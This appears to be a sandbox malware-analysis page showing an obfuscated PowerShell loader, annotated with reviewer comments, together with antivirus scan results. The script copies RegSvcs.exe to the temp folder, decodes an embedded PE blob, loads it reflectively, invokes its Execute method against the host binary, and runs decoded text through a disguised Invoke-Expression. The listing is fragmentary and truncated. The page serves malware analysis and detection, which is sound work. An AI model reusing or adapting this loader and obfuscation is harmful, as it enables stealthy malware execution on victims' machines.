Static | ZeroBOX
No static analysis available.
# NOTE(review): the matching 'try {' for this handler is not part of this listing.
# The empty catch silently discards any error raised by the guarded code.
} catch { }
# Pause for 3 seconds before continuing.
start-sleep 3
# Decodes a string of '0'/'1' characters into ASCII text, 8 bits per output character.
# The complete calls visible in this listing first map a placeholder character to
# '0' or '1' with .Replace(), so the literal on disk is not a plain bit string.
Function asjdiwWWWW($Yatak) {
$byteList = [System.Collections.Generic.List[Byte]]::new()
# Step through the input 8 characters at a time; each slice is parsed as a base-2 byte.
for ($i = 0; $i -lt $Yatak.Length; $i +=8) {
$byteList.Add([Convert]::ToByte([String] $Yatak.Substring($i, 8), 2))
# NOTE(review): the closing braces of the loop and of the function are missing from
# this listing (apparently lost in extraction); the return belongs after the loop.
return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())
# Hex-string decoder with a substitution layer: '~' is expanded to '000' and '%' to '4'
# before the text is parsed two characters at a time as base-16 bytes.
Function holakabutr([String] $IN) {
$RNBX1 = $IN.Replace('~','000').Replace('%','4')
# '/' binds tighter than '+', so the size is (Length / 1) + 1 + 0 = Length + 1, not Length / 2.
# The buffer is therefore larger than the decoded data; the loop never writes its tail.
$bytes = New-Object -TypeName byte[] -ArgumentList ($RNBX1.Length / 1+1+0)
# '1+1+0' evaluates to 2 and '6+10+0' to 16; presumably the constants are spelled as sums
# to avoid the literal values appearing in the script text.
for ($i = 0; $i -lt $RNBX1.Length; $i += 1+1+0) {
$bytes[$i / 2] = [Convert]::ToByte($RNBX1.Substring($i, 1+1+0), 6+10+0)
# NOTE(review): the closing braces of the loop and of the function are missing from this listing.
return [byte[]]$bytes
# Second 3-second pause.
start-sleep 3
# $CLE11 is later decoded by holakabutr and passed as the byte[] argument of the invoked method.
$CLE11 = ''
# NOTE(review): 'BinaryChange' is not valid hex input for holakabutr; it looks like a
# template placeholder or a value substituted in this listing. Confirm against the raw sample.
$CLE11 = 'BinaryChange'
# The $RNBX1 literal that follows is an encoded blob (truncated in this listing). After
# holakabutr's substitutions it begins 4D5A9000..., i.e. an MZ/PE header, and contains the
# hex of the DOS stub text "This program cannot be run in DOS mode".
$RNBX1 = '%D5A9~03~~0%~~FFFF~0B8~~~~00%~~~~~~~~~~~~~~~~~~~~~~~008~~00E1FBA0E00B%09CD21B801%CCD215%6869732070726F6772616D2063616E6E6F7%2062652072756E20696E20%%%F53206D6F6%652E0D0D0A2%~~~~0050%5~0%C010300AB8%0563~~~~~0E~0E010B010B~0A~~008~~~~8EBE~~2~~0C~~~%~002~~002~00%~~~~~%~~~~~~01~002~~~~0300%085~01~001~~~1~001~~~~00F~~~~~~~0%0BE~0%B~~00C~00C80%~~~~~~~~~~~~00E~~C~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~002~~8~~~~~~~0082~00%8~~~~~~~02E7%65787%~~9%9E~~2~~0A~~002~~~~~~~~~02~00602E72737263~~C80%~~C~~006~~A2~~~~~~~~~0%~00%02E72656C6F63~00C~~00E~~002~~A8~~~~~~~~~0%~00%2~~~~~~~~~~0070BE~~~~%8~~02~500287B~0%%33~001~~03~0066CAE~0560E~~~~~~~~~~~~~~~~~~~~~~~~~~~~263802~~2616002A~013300%00CC~~01~0113802~~261616280A~0063917~~262003~~3858~~007201~0700A381%~~26200%~~FE0E0%00280B~006393%~~026F0E~00A17590B386~~~0602076F0F~00A8C17~001281~~A0A0717590B38%2~~2003~~FE0E0%00FE0C0%00%506~~8BFFFFFF92FFFFFF18~~8BFFFFFFABFFFFFF33~~2002~~FE0E0%00280A~0063998FFFFFF38C7FFFFFF~716FE0%16FE010D093A92FFFFFF060C2005~~38A8FFFFFF38~~~82A263802~~261600
# Copies the .NET Framework 4 RegSvcs.exe from its install directory into the user's temp folder.
# Detection note: a framework binary appearing under %TEMP% is unusual and is a useful
# file-creation indicator for this script.
$tempfolder = $env:temp
$destinazione = $tempfolder + "\RegSvcs.exe"
$Path = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Copy-Item $Path -Destination $destinazione
# Looks up the type named 'CALC.PAYSIAS' on the object passed in (the caller passes the
# assembly loaded from the decoded blob).
# NOTE(review): the closing brace of the function is missing from this listing.
Function MyFunciton($Var) {
return $Var.GetType('CALC.PAYSIAS')
# Decode both embedded values to byte arrays: $WULC4 from $CLE11, $YIV4Z from the PE blob in $RNBX1.
[byte[]]$WULC4 = holakabutr($CLE11)
[byte[]]$YIV4Z = holakabutr($RNBX1)
# With '%' mapped to '0' this bit string decodes to the ASCII text "Execute".
$OKM4 = (asjdiwWWWW("%1%%%1%1%1111%%%%11%%1%1%11%%%11%111%1%1%111%1%%%11%%1%1".Replace('%','0')))
# With '%' mapped to '1' this bit string decodes to the ASCII text "Invoke".
$x1ct = (asjdiwWWWW("0%00%00%0%%0%%%00%%%0%%00%%0%%%%0%%0%0%%0%%00%0%".Replace('%','1')))
# From here on $Path points at the RegSvcs.exe copy in the temp folder.
$Path = $destinazione
$Path2 = ''
$Path3 = ''
# [Ref].Assembly yields an Assembly object; calling '::Load' on that instance resolves the
# static Load method of its type, so the decoded bytes are loaded as an in-memory .NET
# assembly without the script naming System.Reflection.Assembly.
# Detection note: script-block logging records this call and the decoded helper names.
$ncr3 = [Ref].Assembly
$ncrx3 = $ncr3::Load(($YIV4Z))
# Resolve type CALC.PAYSIAS in the loaded assembly, then its method named by $OKM4 ("Execute").
$TXN4Z = MyFunciton($ncrx3);
$MG5X = $TXN4Z.'GetMethod'($OKM4);
# NOTE(review): the try/catch wrappers below are fragmentary in this listing (brace-only
# lines are missing); every visible handler is empty, so failures are silently ignored.
} catch { }
try
} catch { }
try
# $MG5X.$x1ct(...) is a call to the method named by $x1ct ("Invoke") on the method object
# looked up earlier, with a null target and two arguments: a path string with any "%%"
# removed, and the $WULC4 byte array.
# In this listing $Path is the temp-folder RegSvcs.exe copy, while $Path2 and $Path3 are empty strings.
# NOTE(review): a (host executable path, byte[]) argument pair is consistent with a loader
# that runs the payload through the host binary; confirm by analysing the loaded assembly.
$MG5X.$x1ct($null,[object[]] ($Path.Replace("%%",""),$WULC4));
$MG5X.$x1ct($null,[object[]] ($Path2.Replace("%%",""),$WULC4));
$MG5X.$x1ct($null,[object[]] ($Path3.Replace("%%",""),$WULC4));
$OASI4 = (asjdiwWWWW("~%%%~~%%~%%%~%~~~%%~~~~%~%%%~~%~~%%%~%~~~~%~%%~%~%%%~~%%~%%~%%~~~%%~~%~%~%%~~%~%~%%%~~~~~~%~~~~~~~%%~~%~~~%%~~%%~~~~%~%~~~%~~~%%~~%~~~~~~%~~~%~~~%%~%~~%~%%%~~%%~%%~~~~%~%%~~~%~~%%~%%~~~%%~~%~%~~%~~~~~~%~%~~%%~%%~~~%%~%%%~~%~~%%~%~~%~%%%~~~~~%%%~%~~~~%~~~~~~%~~%%~~~%%~%%%%~%%~~%%%~%%~~%%%~%%~%~~%~%%~%%%~~%%~~%%%~~%%%~%~~~~~%~%~~~%~~%~~~%%%~~%%~%%~~%~%~%%%~%~~~%%%~%~~~%%~%~~%~%%~%%%~~%%~~%%%~%%%~~%%~~%~~~~~~~%%%%~%~~%~~~~~~%~%%~%%~%~%~~%~~%%~~%~%~%%~~%%~~%~%%%~%~~%~%%%~~%~~~~~%~%%%~~%%~%%%~~%%~%%~~%~%~%%~%%~%~%%~~~%~~%%~%%~~~%%%%~~%~~%~%%%~~%~~~%%%~%%~~%~%~%%%~%~~~%~%~%~~~%%%%~~%~%%%~~~~~%%~~%~%~~%~%~~~~~%~~~%~~%~%~~%%~%%%%~~%~%%%~~%%~%%%~%~~~%%~~%~%~%%~%%~%~~%~%%%~~%~~%%~%~%%~~~~%~%%~%%%~~%%~~~~%~%%~~%%%~%%~~%~%~%%~%%~%~%%~~%~%~%%~%%%~~%%%~%~~~~%~%%%~~%~~~~~%~%%%~%~%~%%%~%~~~%%~%%%%~%%~%%~%~%%~~~~%~%%%~%~~~%%~%~~%~%%~%%%%~%%~%%%~~~%~%%%~~%~%~%~%~%%%~%~~~%%~%~~%~%%~%%~~~%%%~~%%~~%~~~%~~~%~%~~%~~%~%%%~~%~~~%%%~%%~~%~%~%%%~%~~~%~~~%%~~%%~%~~%~%%~~%~%~%%~%%~~~%%~~%~~~~%~%~~~~~%~~~%~~%%~~~%
# The parenthesised expression builds the string 'IEX': '{x}{9}' becomes '{1}{0}', formatting
# with 'lun','%%' gives '%%lun', and the two final replaces turn that into 'IEX'.
# The decoded text in $OASI4 is therefore piped to Invoke-Expression and run as PowerShell.
# The $OASI4 literal is truncated in this listing and is not decoded here.
$OASI4 | .('{x}{9}'.replace('9','0').replace('x','1')-f'lun','%%').replace('%%','I').replace('lun','EX')
$DEF = (asjdiwWWWW("~%~~~~~%~%%~~%~~~%%~~%~~~~%~%%~%~%~~%%~%~%%%~~~~~%~%~~~~~%%%~~%~~%%~~%~%~%%~~%%~~%%~~%~%~%%%~~%~~%%~~%~%~%%~%%%~~%%~~~%%~%%~~%~%~~%~~~~~~~%~%%~%~%~~~%~%~%%%%~~~~%%~~~%%~%%~%%~~~%%%~%~%~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~%~~~%~%~%%%%~~~~%%%~%~~~%%~~%~%~%%~%%%~~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~~%~~~~~~~%~~~%~~~%~%%%~~%%~~~%~~%%~~~~%~%%%~%~~~~%~~~%~~~~~%~%~~%~~~~~%~%%~~%~~~%%~~%~~~~%~%%~%~%~~%%~%~%%%~~~~~%~%~~~~~%%%~~%~~%%~~%~%~%%~~%%~~%%~~%~%~%%%~~%~~%%~~%~%~%%~%%%~~%%~~~%%~%%~~%~%~~%~~~~~~~%~%%~%~%~~~%~%~%%%%~~~~%%~~~%%~%%~%%~~~%%%~%~%~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~%~~~%~%~%%%%~~~~%%%~%~~~%%~~%~%~%%~%%%~~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~~%~~~~~~~%~~~%~~~%~%%%~~%%%~~~~~%%%~~~~~%%~~~~%~%%~%%~%~~%~~~%~~~~~%~%~~%~~~~~%~%%~~%~~~%%~~%~~~~%~%%~%~%~~%%~%~%%%~~~~~%~%~~~~~%%%~~%~~%%~~%~%~%%~~%%~~%%~~%~%~%%%~~%~~%%~~%~%~%%~%%%~~%%~~~%%~%%~~%~%~~%~~~~~~~%~%%~%~%~~~%~%~%%%%~~~~%%~~~%%~%%~%%~~~%%%~%~%~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~%~~~%~%~%%%%~~~~%%%~%~~~%%~~%~%~%%~%%%~~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~~%~
# Same construction as the earlier pipeline: the expression evaluates to 'IEX', so the decoded
# text in $DEF is piped to Invoke-Expression and run as PowerShell.
# The $DEF literal is truncated in this listing and is not decoded here.
$DEF | .('{x}{9}'.replace('9','0').replace('x','1')-f'lun','%%').replace('%%','I').replace('lun','EX')
} catch { }
} catch { }
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.904.4AC62278
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 PowerShell/Agent.ANW
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.904.4AC62278
NANO-Antivirus Clean
SUPERAntiSpyware Clean
Rising Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.904.4AC62278
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Heur.BZC.PZQ.Boxter.904.4AC62278
Emsisoft Heur.BZC.PZQ.Boxter.904.4AC62278 (B)
GData Heur.BZC.PZQ.Boxter.904.4AC62278
Jiangmin Clean
Avira Clean
MAX malware (ai score=89)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.904.4AC62278
ViRobot Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
ALYac Heur.BZC.PZQ.Boxter.904.4AC62278
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.